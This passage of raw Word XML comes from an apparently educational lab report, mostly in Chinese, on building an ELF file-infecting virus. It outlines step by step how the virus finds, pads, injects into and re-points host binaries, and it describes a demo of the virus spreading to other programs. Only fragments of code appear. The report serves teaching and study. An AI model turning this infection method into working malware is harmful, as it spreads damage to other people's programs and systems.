        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:t xml:space="preserve">size of the </w:t>
      </w:r>
      <w:r w:rsidR="00B24F74">
        <w:t>segment</w:t>
      </w:r>
      <w:r w:rsidR="00012F69">
        <w:t xml:space="preserve"> in the program header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C25389" w14:textId="77777777" w:rsidR="00012F69" w:rsidRPr="00B24F74" w:rsidRDefault="00012F69" w:rsidP="00012F69">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210B6DF0" w14:textId="110BAA3E" w:rsidR="00E55B22" w:rsidRDefault="00E55B22" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将病毒母体代码以机器码形式放入ELF的一个</w:t>
      </w:r>
      <w:r w:rsidR="00B24F74">
        <w:t>segment</w:t>
      </w:r>
      <w:r w:rsidR="00AF4449">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E854862" w14:textId="77777777" w:rsidR="00370DDD" w:rsidRDefault="00370DDD" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒母体使用C语言内嵌汇编，随后编译成机器码使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36BA48" w14:textId="77777777" w:rsidR="00172586" w:rsidRDefault="00C857D7" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒母体</w:t>
      </w:r>
      <w:r w:rsidR="003C4919">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码解析如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="420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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60E74" w:rsidRPr="00D60E74" w14:paraId="067EEA54" w14:textId="77777777" w:rsidTr="00605CAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50953E76" w14:textId="77777777" w:rsidR="00370DDD" w:rsidRPr="00D60E74" w:rsidRDefault="00370DDD" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>syscall(SYS_getdents, fd, buf, 4096); A syscall to read '.', the content file, since it's a protected file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088A1AB3" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="00D60E74" w:rsidRDefault="00AF4449" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="352EF2BC" w14:textId="77777777" w:rsidR="00370DDD" w:rsidRPr="004F6F46" w:rsidRDefault="00370DDD" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>enumerate all files and infect the files which has enough space to write down the virus code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6522E87E" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00AF4449" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="073E0D95" w14:textId="77777777" w:rsidR="00370DDD" w:rsidRDefault="00370DDD" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Then create a sign to get rid of infecting twice.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264F2DDC" w14:textId="77777777" w:rsidR="00AC0C57" w:rsidRPr="00AC0C57" w:rsidRDefault="00AC0C57" w:rsidP="00AC0C57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11AC9EA7" w14:textId="5EBF57DD" w:rsidR="00AC0C57" w:rsidRPr="004F6F46" w:rsidRDefault="00AC0C57" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Add zeros into the end of the target, prepare some empty space for code injection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729BBE81" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00AF4449" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="691F10B0" w14:textId="4C11C7EF" w:rsidR="00370DDD" w:rsidRPr="00AC0C57" w:rsidRDefault="00274950" w:rsidP="00AC0C57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Consolas" w:hAnsi="Consolas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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">char *elf_file = </w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Mymmap(0, stat.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);</w:t>
            </w:r>
            <w:r w:rsidR="00AC0C57">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>mapping</w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>the ELF</w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:r w:rsidR="00370DDD" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> to the memory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D02FD7" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00AF4449" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38C82745" w14:textId="77777777" w:rsidR="00370DDD" w:rsidRDefault="00AF4449" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Get the elf header, get the program header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655D75C1" w14:textId="77777777" w:rsidR="00876384" w:rsidRPr="00876384" w:rsidRDefault="00876384" w:rsidP="00876384">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01318F92" w14:textId="0D93BFEC" w:rsidR="00876384" w:rsidRDefault="00027773" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Move the segments, preparing the injection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0DD8AC" w14:textId="77777777" w:rsidR="004F4890" w:rsidRPr="004F4890" w:rsidRDefault="004F4890" w:rsidP="004F4890">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C2BF2CA" w14:textId="03C9BA99" w:rsidR="004F4890" w:rsidRPr="004F6F46" w:rsidRDefault="004F4890" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Copy the virus code into the target.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A6BA9E" w14:textId="77777777" w:rsidR="00D60E74" w:rsidRPr="004F6F46" w:rsidRDefault="00D60E74" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1751EAB6" w14:textId="5558CF0E" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00913713" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas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sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Then </w:t>
            </w:r>
            <w:r w:rsidR="00AF4449" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">calculate jump target </w:t>
            </w:r>
            <w:r w:rsidR="00AF4449" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidR="00AF4449" w:rsidRPr="00D60E74">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> change jump instruction to jump to the original file code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA5FB25" w14:textId="77777777" w:rsidR="00D60E74" w:rsidRPr="004F6F46" w:rsidRDefault="00D60E74" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46A0942B" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00AF4449" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="004F6F46">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">hen </w:t>
            </w:r>
            <w:r w:rsidRPr="004F6F46">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>change the size of the section in the program header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19610FFD" w14:textId="77777777" w:rsidR="00D60E74" w:rsidRPr="004F6F46" w:rsidRDefault="00D60E74" w:rsidP="00493E7F">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BAF12A2" w14:textId="77777777" w:rsidR="00AF4449" w:rsidRPr="004F6F46" w:rsidRDefault="00AF4449" w:rsidP="00370DDD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Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F6F46">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Then change the</w:t>
            </w:r>
            <w:r w:rsidRPr="004F6F46">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> entry of the ELF file in the ELF header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466AB3C2" w14:textId="77777777" w:rsidR="00605CAC" w:rsidRPr="00D60E74" w:rsidRDefault="00605CAC" w:rsidP="00605CAC"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70BCABD9" w14:textId="77777777" w:rsidR="00605CAC" w:rsidRPr="00370DDD" w:rsidRDefault="00605CAC" w:rsidP="00785E1C"/>
    <w:p w14:paraId="1119968D" w14:textId="77777777" w:rsidR="005022D8" w:rsidRDefault="005022D8" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1564C" w14:textId="5BD21D28" w:rsidR="00172586" w:rsidRDefault="00172586" w:rsidP="00605CAC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syscall在64位和32</w:t>
      </w:r>
      <w:r w:rsidR="00785E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的用法不同，主要是用于传送参数的寄存器不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748687E" w14:textId="77777777" w:rsidR="003C4919" w:rsidRPr="005022D8" w:rsidRDefault="002A68F8" w:rsidP="00605CAC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文件目录在当前所在路径的“.”文件中，该文件不能被open系统调用打开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD7D2B" w14:textId="6604A3AB" w:rsidR="003C4919" w:rsidRDefault="00785E1C" w:rsidP="00605CAC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内嵌汇编要加volatile，不然会被编译器优化吃掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710034F" w14:textId="4CDDAD5F" w:rsidR="00785E1C" w:rsidRDefault="00785E1C" w:rsidP="00785E1C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移动section的时候，要注意偏移量能整除pagesize。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17BAD5" w14:textId="77777777" w:rsidR="003C4919" w:rsidRDefault="003C4919" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C67398B" w14:textId="77777777" w:rsidR="003C4919" w:rsidRDefault="003C4919" w:rsidP="001C7A47">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F17843A" w14:textId="77777777" w:rsidR="001C7A47" w:rsidRDefault="001C7A47" w:rsidP="001C7A47">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5438934A" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="001C7A47" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="19775F24" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="1389B914" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="258DF54E" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="52087E49" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRDefault="00A373AD"/>
    <w:p w14:paraId="2AE1A544" w14:textId="77777777" w:rsidR="00A373AD" w:rsidRPr="003A1978" w:rsidRDefault="00A373AD">
      <w:pPr>
        <w:rPr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1978">
        <w:rPr>
          <w:rFonts w:hint="eastAsia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实验演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DE703" w14:textId="20443E05" w:rsidR="00346348" w:rsidRDefault="00FC0176" w:rsidP="00FC0176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编译病毒母体infect，并编译第一代被感染者a_b</w:t>
      </w:r>
      <w:r>
        <w:t>.c, hw.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BFFBC" w14:textId="4752A705" w:rsidR="00FC0176" w:rsidRDefault="00FC0176" w:rsidP="00FC0176">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>a_b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个A+B，hw是hello world。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE5597" w14:textId="77777777" w:rsidR="00FC0176" w:rsidRDefault="00E20A2A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22393A7D" wp14:editId="418268A9">
            <wp:extent cx="5270500" cy="1320800"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="pics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s/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9F813" w14:textId="77777777" w:rsidR="00FC0176" w:rsidRDefault="00FC0176"/>
    <w:p w14:paraId="30DBD7A5" w14:textId="3052317A" w:rsidR="00FC0176" w:rsidRDefault="00D02BDA" w:rsidP="00FC0176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执行一遍</w:t>
      </w:r>
      <w:r>
        <w:t>a_b, hw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，确认被感染前的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62165055" w14:textId="77777777" w:rsidR="00D02BDA" w:rsidRDefault="00E20A2A" w:rsidP="00D02BDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382BA61D" wp14:editId="5140F692">
            <wp:extent cx="5270500" cy="1193800"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="pics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s/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7873F" w14:textId="723658B3" w:rsidR="00D02BDA" w:rsidRDefault="00D02BDA" w:rsidP="00D02BDA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执行母体，释放病毒给</w:t>
      </w:r>
      <w:r>
        <w:t>a_b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并再次执行a_b</w:t>
      </w:r>
      <w:r w:rsidR="00ED1C3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现多输出了一句诗，并且它在后台感染了本目录的其他文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5B8AB3" w14:textId="682DD5BB" w:rsidR="00012898" w:rsidRDefault="00FE547A" w:rsidP="00D02BDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16654B58" wp14:editId="3F8C2E26">
            <wp:extent cx="5267325" cy="8286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30643" w14:textId="61F65FCC" w:rsidR="00012898" w:rsidRDefault="00012898" w:rsidP="0001289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现在运行我们没有刻意感染的hello world，发现它也被感染了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D13865" w14:textId="77963F45" w:rsidR="00012898" w:rsidRDefault="00FE547A" w:rsidP="00012898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5071424C" wp14:editId="743A31D2">
            <wp:extent cx="5267325" cy="7143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3E554" w14:textId="1C56C020" w:rsidR="00012898" w:rsidRDefault="00012898" w:rsidP="0001289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将第一代病毒拷贝到另外一个目录，以确认其具备再次感染的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59558452" w14:textId="77777777" w:rsidR="00012898" w:rsidRDefault="00E20A2A" w:rsidP="00012898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A146FD6" wp14:editId="23BE7486">
            <wp:extent cx="5270500" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="pics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s/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567DA" w14:textId="693D5868" w:rsidR="00012898" w:rsidRDefault="00012898" w:rsidP="0001289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这个目录下也是有一个</w:t>
      </w:r>
      <w:r>
        <w:t>A+B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>hello world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们将被感染的文件命名为</w:t>
      </w:r>
      <w:r>
        <w:t>virus_gen2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA5636A" w14:textId="3F8A37E0" w:rsidR="00012898" w:rsidRDefault="00FE547A" w:rsidP="00012898">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40FAAEE5" wp14:editId="5E4CB35F">
            <wp:extent cx="5267325" cy="19335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A934C" w14:textId="6440F2D3" w:rsidR="00012898" w:rsidRDefault="00012898" w:rsidP="0001289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再次运行gen2，正常运行，然后在运行同目录下的</w:t>
      </w:r>
      <w:r>
        <w:t>A+B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
